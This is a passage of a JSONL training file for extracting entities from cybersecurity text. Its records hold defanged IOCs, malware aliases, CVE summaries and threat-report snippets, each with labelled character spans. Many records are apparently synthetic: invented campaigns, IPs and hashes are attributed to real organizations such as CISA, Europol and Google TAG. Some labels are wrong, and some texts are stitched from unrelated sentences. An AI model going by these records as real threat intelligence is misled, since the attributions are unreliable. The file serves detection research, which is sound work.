] 85.", "spans": {"Organization: SentinelOne": [[26, 37]], "Indicator: admin@auth-check.org": [[106, 128]], "Indicator: security@secure-verify.net": [[133, 163]], "Indicator: http://secure-portal.org/login": [[220, 252]], "Indicator: sync-edge.live": [[298, 314]], "Indicator: hxxps://portalbackup.io/login": [[333, 364]], "Malware: SmokeLoader": [[375, 386]], "Indicator: 3b4cb32a398300a5a06cd313ad99a8a29a43e65a": [[394, 434]], "Indicator: 192.97.21.85": [[522, 552]]}, "info": {"id": "synth_v2_00878", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 17 [ . ] 197 [ . ] 96 [ . ] 122, the Cisco Talos IR team identified DanaBot running as C:\\Users\\admin\\Downloads\\runtime.dll. The threat actor, believed to be Salt Typhoon, used Ligolo for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to auth-edge[ . ]org and static-proxy[.]com. The initial dropper (MD5: 30d739b0d350f64911bc0657d0bce8d0) was delivered via a phishing email from helpdesk@mail-service[.]info. A second C2 node was observed at 172[.]231[.]155[.]24, with a persistence mechanism writing to C:\\ProgramData\\lsass.dmp.", "spans": {"Indicator: 17.197.96.122": [[64, 95]], "Organization: Cisco Talos": [[101, 112]], "Malware: DanaBot": [[132, 139]], "Indicator: auth-edge.org": [[340, 357]], "Indicator: static-proxy.com": [[362, 380]], "Indicator: 30d739b0d350f64911bc0657d0bce8d0": [[408, 440]], "Indicator: helpdesk@mail-service.info": [[482, 510]], "Indicator: 172.231.155.24": [[545, 565]]}, "info": {"id": "synth_v2_00310", "source": "defanged_augment"}} {"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab[ . ]exe , probably for compressing stolen data to be uploaded .", "spans": {"Vulnerability: zero-day vulnerability": [[123, 145]], "Malware: Powermud backdoor": [[334, 351]], "Malware: Backdoor.Powemuddy": [[371, 389]], "Malware: custom tools": [[398, 410]], "System: Windows": [[511, 518]], "Indicator: makecab.exe": [[543, 558]]}, "info": {"id": "cyberner_stix_train_001203", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom[.]Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9984 Packed.NSISPacker!g6 Ransom_.97182692 Trojan.NSIS.Androm.7 Trojan.Win32.Graftor.evkohe Trojan:W32/Gamarue.E Trojan.Inject2.64079 Ransom_.97182692 BehavesLike[.]Win32[.]Ransom[.]cc Trojan.Win32.Injector W32/Trojan.HJUO-7930 Trojan.Graftor.D6B214 Ransom.Cerber/Variant Ransom:Win32/Malasypt.A Trojan/Win32.Miuref.R183155 Trj/CI.A Trojan.Injector!s1rN7kKLdpI W32/Injector.DDGJ!tr Win32/Trojan.5c1", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Ransom.Onion": [[47, 61]], "Indicator: BehavesLike.Win32.Ransom.cc": [[253, 286]]}, "info": {"id": "cyner2_train_006529", "source": "defanged_augment"}} {"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0 [ . ] 9 [ . ] 8 [ . ] 923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of root. 
Was ZDI-CAN-9717.", "spans": {"Indicator: 0.9.8.923": [[131, 158]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15618"}} {"text": "Malware Analysis Report: Conti (SHA1: 63ca8e9737f0f4f81dda226ca748b526d6de1c1f). Upon execution on Progress Telerik, the sample creates C:\\Windows\\Tasks\\dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 164[.]126[.]105[.]154 every 60 seconds and DNS queries to secureproxy[.]tech. The second stage was fetched from hxxps://portal-proxy[ . ]club/collect and written to /opt/app/bin/payload.bin. The payload uses Nmap-style techniques for defense evasion. A secondary hash (SHA1: f9765294dfbb0412874a862b43fa68ba0ccfb146) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: 63ca8e9737f0f4f81dda226ca748b526d6de1c1f": [[38, 78]], "System: Progress Telerik": [[99, 115]], "Indicator: 164.126.105.154": [[240, 261]], "Indicator: secureproxy.tech": [[298, 316]], "Indicator: https://portal-proxy.club/collect": [[352, 389]], "Indicator: f9765294dfbb0412874a862b43fa68ba0ccfb146": [[515, 555]]}, "info": {"id": "synth_v2_00588", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.BackdoorSlingup.Trojan Trojan/W32.Fsysna.77824.F Heur.Win32.VBKrypt.3!O Backdoor.Slingup.MF.150 Win32.Worm.VB.rt W32/Trojan.XMLD-4299 W32.Difobot BKDR_GORYNYCH.SM Trojan.Win32.Fsysna.ccit Trojan.Win32.Fsysna.dwujaf Troj.W32.Fsysna.tnPd Trojan.DownLoader14.15241 Trojan.Fsysna.Win32.7242 BKDR_GORYNYCH.SM BehavesLike[ . ]Win32[ . ]Backdoor[ . ]lt Worm.Win32.VB W32/Trojan3.TRB Trojan/Fsysna.dgo Trojan/Win32.Fsysna Trojan.Win32.Fsysna.ccit Trojan/Win32.VBInject.R158763 Trojan.Fsysna Trojan.Reconyc Win32/VB.OOB Win32.Trojan.Fsysna.Phgj", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.lt": [[334, 375]]}, "info": {"id": "cyner2_train_000069", "source": "defanged_augment"}} {"text": "] today shop [ . 
The name Mofang is based on the Mandarin verb , which means to imitate . Backdoor[.]APT[.]Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"Indicator: Backdoor.APT.Aumlib": [[90, 113]]}, "info": {"id": "cyberner_stix_train_005296", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Havoc artifacts at /home/user/.config/winlogon.exe. Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\winlogon.exe. Network forensics identified connections to 113 [ . ] 116 [ . ] 51 [ . ] 243 and backup-node[ . ]tech. Email headers traced the initial vector to info@mail-service[ . ]info. File C:\\Windows\\System32\\payload.bin (SHA1: a8e8efc33eb8468d23ed3d20b890f128c179e8ed) was identified as the initial dropper. A staging URL hxxp://cdn-login[ . ]tech/callback resolved to 10[.]143[.]117[.]212. Secondary artifact hash: SHA1: 663254acc13c6c7e14596ef3875b4dd07c6d16d7.", "spans": {"Indicator: 113.116.51.243": [[318, 350]], "Indicator: backup-node.tech": [[355, 375]], "Indicator: info@mail-service.info": [[420, 446]], "Indicator: a8e8efc33eb8468d23ed3d20b890f128c179e8ed": [[492, 532]], "Indicator: hxxp://cdn-login.tech/callback": [[587, 621]], "Indicator: 10.143.117.212": [[634, 654]], "Indicator: 663254acc13c6c7e14596ef3875b4dd07c6d16d7": [[687, 727]]}, "info": {"id": "synth_v2_01113", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 24[.]204[.]130[.]46, the INTERPOL IR team identified QakBot running as /home/user/.config/beacon.dll. The threat actor, believed to be Aqua Blizzard, used Impacket for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to secure-portal[ . ]link and backuplogin[.]net. 
The initial dropper (SHA1: e18ca283e50fd7dd3d3b395a86e8c03b980bc62b) was delivered via a phishing email from noreply@auth-check[.]org. A second C2 node was observed at 172 [ . ] 45 [ . ] 10 [ . ] 219, with a persistence mechanism writing to C:\\Program Files\\Common Files\\agent.py.", "spans": {"Indicator: 24.204.130.46": [[64, 83]], "Organization: INTERPOL": [[89, 97]], "Malware: QakBot": [[117, 123]], "Indicator: secure-portal.link": [[318, 340]], "Indicator: backuplogin.net": [[345, 362]], "Indicator: e18ca283e50fd7dd3d3b395a86e8c03b980bc62b": [[391, 431]], "Indicator: noreply@auth-check.org": [[473, 497]], "Indicator: 172.45.10.219": [[532, 563]]}, "info": {"id": "synth_v2_00269", "source": "defanged_augment"}} {"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64[.]251[.]19[.]231 [REDACTED][ . ]ddns[ . ]net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"System: Android": [[31, 38]], "System: KitKat": [[52, 58]], "System: Jelly Bean": [[89, 99]], "Vulnerability: Eternalblue SMBv1 exploit": [[226, 251]], "Indicator: 64.251.19.231": [[262, 281]], "Indicator: [REDACTED].ddns.net": [[282, 309]]}, "info": {"id": "cyberner_stix_train_002573", "source": "defanged_augment"}} {"text": "Canarytokens is an open source tool which helps track activity and actions on your network. A Cross-Site Scripting vulnerability was identified in the history page of triggered Canarytokens. This permits an attacker who recognised an HTTP-based Canarytoken (a URL) to execute Javascript in the Canarytoken's history page (domain: canarytokens[ . ]org) when the history page is later visited by the Canarytoken's creator. 
This vulnerability could be used to disable or delete the affected Canarytoken, or view its activation history. It might also be used as a stepping stone towards revealing more information about the Canarytoken's creator to the attacker. For example, an attacker could recover the email address tied to the Canarytoken, or place Javascript on the history page that redirect the creator towards an attacker-controlled Canarytoken to show the creator's network location. An attacker could only act on the discovered Canarytoken. This issue did not expose other Canarytokens or other Canarytoken creators. The issue has been patched on Canarytokens[ . ]org and in the latest release. No signs of successful exploitation of this vulnerability have been found. Users are advised to upgrade. There are no known workarounds for this issue.", "spans": {"Indicator: canarytokens.org": [[330, 350]], "Indicator: Canarytokens.org": [[1054, 1074]], "Vulnerability: Cross-Site Scripting": [[94, 114]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-31113"}} {"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . Daily_Report[ . ]docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"Indicator: Daily_Report.docx": [[335, 356]], "Organization: enterprises": [[411, 422]], "Organization: pharmaceutics": [[440, 453]], "Organization: telecommunications": [[458, 476]]}, "info": {"id": "cyberner_stix_train_004458", "source": "defanged_augment"}} {"text": "Blog Post by Trend Micro: Tracking Charming Kitten's Latest Operations. 
Our research team has uncovered a new campaign leveraging CVE-2024-27546 against Ivanti Connect Secure deployments. The initial access vector involves spear-phishing emails from billing@mail-service[.]info delivering Lumma Stealer. Post-compromise, the attackers deploy IcedID and use Mimikatz for reconnaissance. C2 infrastructure includes 145[.]45[.]185[.]197 and datasync[.]top. A staging server at hxxp://portalmail[ . ]net/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /usr/local/bin/update.dll (MD5: 74c2735811bcfaee412e6e4287e94239).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2024-27546": [[130, 144]], "System: Ivanti Connect Secure": [[153, 174]], "Indicator: billing@mail-service.info": [[250, 277]], "Malware: Lumma Stealer": [[289, 302]], "Malware: IcedID": [[342, 348]], "Indicator: 145.45.185.197": [[413, 433]], "Indicator: datasync.top": [[438, 452]], "Indicator: hxxp://portalmail.net/wp-content/uploads/doc.php": [[474, 526]], "Indicator: 74c2735811bcfaee412e6e4287e94239": [[599, 631]]}, "info": {"id": "synth_v2_01677", "source": "defanged_augment"}} {"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn[ . ]com realtek-cdn[ . ]com logitech-cdn[.]com pci-cdn[ . ]com appleservice-cdn[ . ]com servicebing-cdn[ . ]com . 
On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"Malware: Anubis": [[86, 92]], "Organization: Symantec": [[211, 219]], "Malware: FIN7 S-APT/GRIFFON": [[325, 343]], "Indicator: hpservice-cdn.com": [[346, 367]], "Indicator: realtek-cdn.com": [[368, 387]], "Indicator: logitech-cdn.com": [[388, 406]], "Indicator: pci-cdn.com": [[407, 422]], "Indicator: appleservice-cdn.com": [[423, 447]], "Indicator: servicebing-cdn.com": [[448, 471]], "Organization: @AnFam17": [[487, 495]]}, "info": {"id": "cyberner_stix_train_003311", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.DeadBeef.Worm Worm/W32.AutoRun.175104 Worm.Win32.AutoRun!O Worm.AutoRun.Win32.8121 W32/AutoRun.pv W32.SillyFDC Win32/Wainlas.A WORM_AUTORUN_000002c.TOMA Win.Worm.Autorun-1414 Worm.Win32.AutoRun.pv Trojan.Win32.AutoRun.ltul Win32.Worm.Autorun.Tbim Worm.Win32.AutoRun.~MAA Win32.HLLW.Autoruner.748 WORM_AUTORUN_000002c.TOMA Worm/AutoRun.bhu TR/Drop.AutoRun.BM Worm/Win32.AutoRun Worm.Win32.Autorun.12728 Worm.Win32.AutoRun.pv Worm/Win32.AutoRun.R16694 Worm.AutoRun Worm.Win32.AutoRun W32/AutoRun.NTQ!worm Trj/Debat.A Trojan[ . ]PSW[ . ]Win32[ . ]QQPass[ . ]CF", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.PSW.Win32.QQPass.CF": [[545, 587]]}, "info": {"id": "cyner2_train_002068", "source": "defanged_augment"}} {"text": "Symantec published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2022-40108 in SonicWall SMA. The attackers deployed Latrodectus via BITSAdmin, establishing C2 communication with 13[.]176[.]195[.]202 and portalsecure[.]link. A secondary payload was downloaded from hxxp://datadata[ . ]info/gate.php. The malware binary (SHA256: 166d51ec8b6262b278b7a6e1347a8a4ec40242344b44da1cf87ab1c11d566a63) was dropped to C:\\Program Files\\Common Files\\ntds.dit. Phishing emails were sent from confirm@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 179 [ . 
] 213 [ . ] 209 [ . ] 39.", "spans": {"Organization: Symantec": [[0, 8]], "Vulnerability: CVE-2022-40108": [[91, 105]], "System: SonicWall SMA": [[109, 122]], "Malware: Latrodectus": [[147, 158]], "Indicator: 13.176.195.202": [[209, 229]], "Indicator: portalsecure.link": [[234, 253]], "Indicator: hxxp://datadata.info/gate.php": [[295, 328]], "Indicator: 166d51ec8b6262b278b7a6e1347a8a4ec40242344b44da1cf87ab1c11d566a63": [[358, 422]], "Indicator: confirm@urgent-notice.online": [[510, 540]], "Indicator: 179.213.209.39": [[606, 638]]}, "info": {"id": "synth_v2_00078", "source": "defanged_augment"}} {"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates[ . ]vbs ” . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"Indicator: templates.vbs": [[294, 311]], "Organization: Bradshaw": [[321, 329]], "Organization: he and his then - girlfriend": [[359, 387]]}, "info": {"id": "cyberner_stix_train_006544", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Zscaler ThreatLabz identified a large-scale phishing operation. Emails originated from confirm@mail-service[ . ]info and billing@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxp://cloud-data[ . ]top/secure/token which hosted a credential harvesting page on static-sync[ . ]tech. A secondary link hxxp://node-portal[.]net/download/update.exe delivered FormBook (MD5: 410cdd0ebbbe8086c372d4033dcca27d). 
The malware was saved to /opt/app/bin/payload.bin and established C2 with 172[.]95[.]204[.]77.", "spans": {"Organization: Zscaler ThreatLabz": [[26, 44]], "Indicator: confirm@mail-service.info": [[113, 142]], "Indicator: billing@login-portal.tech": [[147, 174]], "Indicator: hxxp://cloud-data.top/secure/token": [[231, 269]], "Indicator: static-sync.tech": [[315, 335]], "Indicator: hxxp://node-portal.net/download/update.exe": [[354, 398]], "Malware: FormBook": [[409, 417]], "Indicator: 410cdd0ebbbe8086c372d4033dcca27d": [[424, 456]], "Indicator: 172.95.204.77": [[533, 552]]}, "info": {"id": "synth_v2_01041", "source": "defanged_augment"}} {"text": "CISA detected a multi-stage attack chain. The initial phishing email from security@identity-verify[ . ]cc contained a link to hxxps://dataedge[.]xyz/api/v2/auth. This redirected to hxxps://edgemail[ . ]online/callback on backup-backup[.]site. A secondary email from info@credential-check[ . ]site pointed to hxxps://gatewayupdate[ . ]io/admin/config which delivered WarmCookie. The final payload callback was hxxps://apinode[ . ]top/admin/config resolving to 172 [ . ] 193 [ . ] 17 [ . ] 238 via edge-node[.]link.", "spans": {"Organization: CISA": [[0, 4]], "Indicator: security@identity-verify.cc": [[74, 105]], "Indicator: hxxps://dataedge.xyz/api/v2/auth": [[126, 160]], "Indicator: hxxps://edgemail.online/callback": [[181, 217]], "Indicator: backup-backup.site": [[221, 241]], "Indicator: info@credential-check.site": [[266, 296]], "Indicator: hxxps://gatewayupdate.io/admin/config": [[308, 349]], "Malware: WarmCookie": [[366, 376]], "Indicator: hxxps://apinode.top/admin/config": [[409, 445]], "Indicator: 172.193.17.238": [[459, 491]], "Indicator: edge-node.link": [[496, 512]]}, "info": {"id": "synth_v2_01725", "source": "defanged_augment"}} {"text": "Europol published a threat intelligence report linking Volt Typhoon to a new campaign exploiting CVE-2021-37696 in Ivanti Connect Secure. 
The attackers deployed Meduza Stealer via Ligolo, establishing C2 communication with 217[.]234[.]88[.]209 and data-backup[.]net. A secondary payload was downloaded from hxxp://mail-login[ . ]io/callback. The malware binary (SHA1: 36ac1f70c33bf6477c22d4076969fc664ef0b6db) was dropped to C:\\Windows\\System32\\shell.php. Phishing emails were sent from service@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 158[.]43[.]68[.]81.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2021-37696": [[97, 111]], "System: Ivanti Connect Secure": [[115, 136]], "Malware: Meduza Stealer": [[161, 175]], "Indicator: 217.234.88.209": [[223, 243]], "Indicator: data-backup.net": [[248, 265]], "Indicator: http://mail-login.io/callback": [[307, 340]], "Indicator: 36ac1f70c33bf6477c22d4076969fc664ef0b6db": [[368, 408]], "Indicator: service@identity-verify.cc": [[487, 517]], "Indicator: 158.43.68.81": [[583, 601]]}, "info": {"id": "synth_v2_00094", "source": "defanged_augment"}} {"text": "Artifact Analysis for Hive campaign:\nStage 1 dropper at /usr/local/bin/lsass.dmp - SHA256: 1bcb0a6eed1c296651a768bb74cc64d005c762063547ff12704940f80d60384f\nStage 2 loader at C:\\Users\\Public\\Documents\\agent.py - SHA256: 665e5f2d382cea6d7f9da97bb0d4d87569a997beaee37f85e1ac143aea71c46a\nFinal payload at /tmp/loader.exe - MD5: fceb7b43f0db4102ab6a7afcb092763c\nExfiltration module - SHA1: 8fa3b6f7705cbdcd5780d42a8039942081baad88\nAll stages communicated with 172 [ . ] 254 [ . ] 153 [ . ] 182. 
Covenant signatures detected in Stage 2.", "spans": {"Malware: Hive": [[22, 26]], "Indicator: 1bcb0a6eed1c296651a768bb74cc64d005c762063547ff12704940f80d60384f": [[91, 155]], "Indicator: 665e5f2d382cea6d7f9da97bb0d4d87569a997beaee37f85e1ac143aea71c46a": [[219, 283]], "Indicator: fceb7b43f0db4102ab6a7afcb092763c": [[324, 356]], "Indicator: 8fa3b6f7705cbdcd5780d42a8039942081baad88": [[385, 425]], "Indicator: 172.254.153.182": [[455, 488]]}, "info": {"id": "synth_v2_01989", "source": "defanged_augment"}} {"text": "TG-3390 : 208[.]115[.]242[.]36 .", "spans": {"Indicator: 208.115.242.36": [[10, 30]]}, "info": {"id": "cyberner_stix_train_007691", "source": "defanged_augment"}} {"text": "IOC Bulletin - AgentTesla Campaign:\nNetwork Indicators:\n- 10 [ . ] 6 [ . ] 70 [ . ] 98\n- 172 [ . ] 225 [ . ] 84 [ . ] 18\n- 50 [ . ] 128 [ . ] 197 [ . ] 245\n- storagecloud[.]live\n- apimail[.]dev\nURLs:\n- hxxp://auth-update[.]tech/login\n- hxxp://api-edge[ . ]online/login\nEmail Senders:\n- notification@auth-check[.]org\n- support@credential-check[ . 
]site\nFile Indicators:\n- MD5: 55bf2caa24753bb78545a256d07f7df6\n- MD5: 823c55e38fb689af79d69524ac7a97e2\n- Drop path: /tmp/helper.sh", "spans": {"Malware: AgentTesla": [[15, 25]], "Indicator: 10.6.70.98": [[58, 86]], "Indicator: 172.225.84.18": [[89, 120]], "Indicator: 50.128.197.245": [[123, 155]], "Indicator: storagecloud.live": [[158, 177]], "Indicator: apimail.dev": [[180, 193]], "Indicator: hxxp://auth-update.tech/login": [[202, 233]], "Indicator: hxxp://api-edge.online/login": [[236, 268]], "Indicator: notification@auth-check.org": [[286, 315]], "Indicator: support@credential-check.site": [[318, 351]], "Indicator: 55bf2caa24753bb78545a256d07f7df6": [[376, 408]], "Indicator: 823c55e38fb689af79d69524ac7a97e2": [[416, 448]]}, "info": {"id": "synth_v2_01408", "source": "defanged_augment"}} {"text": "Google TAG published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2026-10752 in Progress Telerik. The attackers deployed Cobalt Strike via ADFind, establishing C2 communication with 192 [ . ] 154 [ . ] 178 [ . ] 108 and static-mail[.]live. A secondary payload was downloaded from hxxps://relay-cloud[ . ]info/wp-content/uploads/doc.php. The malware binary (SHA256: bac29a9b6aeefd90b4e10c373953c04504252cfd57f3d6b883630053b3e6b62a) was dropped to C:\\Windows\\System32\\beacon.dll. Phishing emails were sent from verify@account-update[.]xyz targeting enterprise users. A backup C2 server was identified at 192 [ . ] 120 [ . ] 98 [ . 
] 31.", "spans": {"Organization: Google TAG": [[0, 10]], "Vulnerability: CVE-2026-10752": [[103, 117]], "System: Progress Telerik": [[121, 137]], "Malware: Cobalt Strike": [[162, 175]], "Indicator: 192.154.178.108": [[223, 256]], "Indicator: static-mail.live": [[261, 279]], "Indicator: hxxps://relay-cloud.info/wp-content/uploads/doc.php": [[321, 376]], "Indicator: bac29a9b6aeefd90b4e10c373953c04504252cfd57f3d6b883630053b3e6b62a": [[406, 470]], "Indicator: verify@account-update.xyz": [[550, 577]], "Indicator: 192.120.98.31": [[643, 674]]}, "info": {"id": "synth_v2_00226", "source": "defanged_augment"}} {"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados[ . ]docx ( Attorneys Associates Reservation[.]docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"Malware: Dvmap": [[0, 5]], "System: Android": [[18, 25]], "System: Google Play Store": [[151, 168]], "Vulnerability: Niteris exploit": [[216, 231]], "Organization: banks": [[274, 279]], "Indicator: Reserva Advogados Associados.docx": [[406, 443]], "Indicator: Attorneys Associates Reservation.docx": [[446, 485]], "Vulnerability: CVE-2023 - 37450": [[642, 658]]}, "info": {"id": "cyberner_stix_train_005343", "source": "defanged_augment"}} {"text": "Vetta Loader is a persistent Loader spreading with infected USB drives. 
It downloads other components leveraging legit hosting services.\r\nhxxps://yoroi[.]company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf", "spans": {"Indicator: https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf": [[138, 220]], "Malware: Vetta Loader": [[0, 12]]}, "info": {"source": "defanged_augment", "name": "Vetta Loader"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix mlx5e_priv_init() cleanup flow\n\nWhen mlx5e_priv_init() fails, the cleanup flow calls mlx5e_selq_cleanup which\ncalls mlx5e_selq_apply() that assures that the `priv->state_lock` is held using\nlockdep_is_held().\n\nAcquire the state_lock in mlx5e_selq_cleanup().\n\nKernel log:\n=============================\nWARNING: suspicious RCU usage\n6.8.0-rc3_net_next_841a9b5 #1 Not tainted\n-----------------------------\ndrivers/net/ethernet/mellanox/mlx5/core/en/selq.c:124 suspicious rcu_dereference_protected() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n2 locks held by systemd-modules/293:\n #0: ffffffffa05067b0 (devices_rwsem){++++}-{3:3}, at: ib_register_client+0x109/0x1b0 [ib_core]\n #1: ffff8881096c65c0 (&device->client_data_rwsem){++++}-{3:3}, at: add_client_context+0x104/0x1c0 [ib_core]\n\nstack backtrace:\nCPU: 4 PID: 293 Comm: systemd-modules Not tainted 6.8.0-rc3_net_next_841a9b5 #1\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[ . ]13[ . ]0-0-gf21b5a4aeb02-prebuilt[ . ]qemu[ . ]org 04/01/2014\nCall Trace:\n \n dump_stack_lvl+0x8a/0xa0\n lockdep_rcu_suspicious+0x154/0x1a0\n mlx5e_selq_apply+0x94/0xa0 [mlx5_core]\n mlx5e_selq_cleanup+0x3a/0x60 [mlx5_core]\n mlx5e_priv_init+0x2be/0x2f0 [mlx5_core]\n mlx5_rdma_setup_rn+0x7c/0x1a0 [mlx5_core]\n rdma_init_netdev+0x4e/0x80 [ib_core]\n ? 
mlx5_rdma_netdev_free+0x70/0x70 [mlx5_core]\n ipoib_intf_init+0x64/0x550 [ib_ipoib]\n ipoib_intf_alloc+0x4e/0xc0 [ib_ipoib]\n ipoib_add_one+0xb0/0x360 [ib_ipoib]\n add_client_context+0x112/0x1c0 [ib_core]\n ib_register_client+0x166/0x1b0 [ib_core]\n ? 0xffffffffa0573000\n ipoib_init_module+0xeb/0x1a0 [ib_ipoib]\n do_one_initcall+0x61/0x250\n do_init_module+0x8a/0x270\n init_module_from_file+0x8b/0xd0\n idempotent_init_module+0x17d/0x230\n __x64_sys_finit_module+0x61/0xb0\n do_syscall_64+0x71/0x140\n entry_SYSCALL_64_after_hwframe+0x46/0x4e\n ", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[1070, 1130]], "System: Linux kernel": [[7, 19]], "System: systemd": [[689, 696], [955, 962]], "System: QEMU": [[1028, 1032]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35959"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at C:\\Users\\Public\\Documents\\lsass.dmp. Memory dump analysis confirmed execution of Havoc. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\payload.bin. Network forensics identified connections to 10 [ . ] 27 [ . ] 109 [ . ] 215 and securebackup[ . ]info. Email headers traced the initial vector to it@identity-verify[.]cc. File C:\\Windows\\System32\\sam.hive (SHA1: f847f0475fed82c2a5d009f8a085124923436d4e) was identified as the initial dropper. A staging URL hxxps://api-auth[.]org/wp-content/uploads/doc.php resolved to 173[.]90[.]251[.]18. 
Secondary artifact hash: MD5: e07534afaa11fd0762aa8a8602f99fc2.", "spans": {"Indicator: 10.27.109.215": [[326, 357]], "Indicator: securebackup.info": [[362, 383]], "Indicator: it@identity-verify.cc": [[428, 451]], "Indicator: f847f0475fed82c2a5d009f8a085124923436d4e": [[494, 534]], "Indicator: hxxps://api-auth.org/wp-content/uploads/doc.php": [[589, 638]], "Indicator: 173.90.251.18": [[651, 670]], "Indicator: e07534afaa11fd0762aa8a8602f99fc2": [[702, 734]]}, "info": {"id": "synth_v2_01284", "source": "defanged_augment"}} {"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : hxxps://github[.]com/rxwx/CVE-2017-8570 . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"Organization: Tibetan community": [[268, 285]], "Indicator: https://github.com/rxwx/CVE-2017-8570": [[116, 155]]}, "info": {"id": "cyberner_stix_train_007260", "source": "defanged_augment"}} {"text": "Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor.\r\nGithub: hxxps://github[.]com/jpillora/chisel", "spans": {"Indicator: https://github.com/jpillora/chisel": [[376, 412]], "System: Go": [[165, 167]], "Organization: SentinelOne": [[276, 287]]}, "info": {"source": "defanged_augment", "name": "Chisel"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Seatbelt artifacts at /usr/local/bin/update.dll. Memory dump analysis confirmed execution of LaZagne. Registry modifications pointed to persistence via /usr/local/bin/payload.bin. 
